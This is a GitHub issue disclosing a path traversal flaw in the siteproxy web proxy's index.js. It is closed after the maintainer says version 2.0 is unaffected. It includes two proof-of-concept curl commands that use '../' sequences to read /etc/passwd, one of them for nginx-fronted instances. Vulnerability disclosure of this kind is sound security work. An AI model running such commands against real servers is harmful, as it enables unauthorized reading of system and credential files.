Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

path traversal vulnerability #67

Closed
kdxcxs opened this issue Feb 10, 2023 · 2 comments
Closed

path traversal vulnerability #67

kdxcxs opened this issue Feb 10, 2023 · 2 comments

Comments

@kdxcxs
Copy link

kdxcxs commented Feb 10, 2023

There is no path traversal chek in index.js when sending local files, so it's possible to read any file by path traversal.

poc: curl --path-as-is http://siteproxy.your.domain.name/../../../etc/passwd

image.png

@kdxcxs
Copy link
Author

kdxcxs commented Feb 10, 2023

For instances proxied by nginx:

curl --path-as-is http://siteproxy/\?/../../../../../etc/passwd

@netptop
Copy link
Owner

netptop commented Feb 20, 2024

doesn't exist on siteproxy2.0

@netptop netptop closed this as completed Feb 20, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants